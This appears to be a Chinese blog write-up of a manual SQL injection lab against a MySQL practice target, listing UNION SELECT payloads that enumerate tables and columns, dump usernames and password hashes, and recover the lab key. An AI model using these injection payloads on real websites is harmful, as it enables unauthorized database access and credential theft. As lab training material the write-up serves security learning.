当前位置：首页 > news >正文

SQL手工测试(MySQL数据库)

news 来源：原创 2025/6/9 5:42:24

1.看到注入点，测试列字段数量，发现为4正常，为5出错，可知列数为5

2.找到数据库名mozhe_Discuz_StormGroup

3.查询表名?id=-1%20union%20select%201,2,group_concat(table_name),4%20from%20information_schema.tables%20where%20table_schema=%27mozhe_Discuz_StormGroup%27

得到StormGroup_member,notice

4.查询列名

?id=-1%20union%20select%201,2,group_concat(column_name),4%20from%20information_schema.columns%20where%20table_name=%27StormGroup_member%27

5.获取数据

?id=-1%20union%20select%201,2,concat(name,0x5c,password),4%20from%20StormGroup_member

mozhe\356f589a7df439f6f744ff19bb8092c0

此时发现直接输入会账密错误，说明需要解码

6.将密码解码得到的结果也是始终不正确，考虑其他数据

id=-1%20union%20select%201,2,concat(name,0x5c,password),4%20from%20StormGroup_member%20limit%201,1

mozhe\89f76612d6fbbeb12265a7300301f024

7.再次解密验证

8.成功啦，获得Key:mozhe69c92e07d1330df9daeaeea8738

树莓派超全系列教程文档--(58)通过网络启动树莓派

【LeetCode 热题100】网格路径类 DP 系列题：不同路径最小路径和（力扣62 / 64 ）（Go语言版）

第6章：Neo4j数据导入与导出

自定义连接线程池

408第一季 - 数据结构 - 图

mybatis执行insert如何返回id

星耀8上市品鉴暨北京中和吉晟吉利银河用户中心开业媒体见面会

基于多维视角的大模型提升认知医疗过程层次激励编程分析

关于IE浏览器被绑定安装，还卸载不掉

RabbitMQ work模型

云原生监控体系建设：Prometheus+Grafana的企业级实践

【11408学习记录】考研写作双核引擎：感谢信+建议信复合结构高分模板（附16年真题精讲）

LeetCode - 148. 排序链表

自动驾驶科普(百度Apollo)学习笔记

vue.js not detected解决方法

LinuxSamba服务器配置篇

三级流水线是什么？

12-OPENCV ROCKX项目人脸拍照

抖音怎么下载没有水印的视频？

【计算机网络】三报文握手建立TCP连接

相关文章：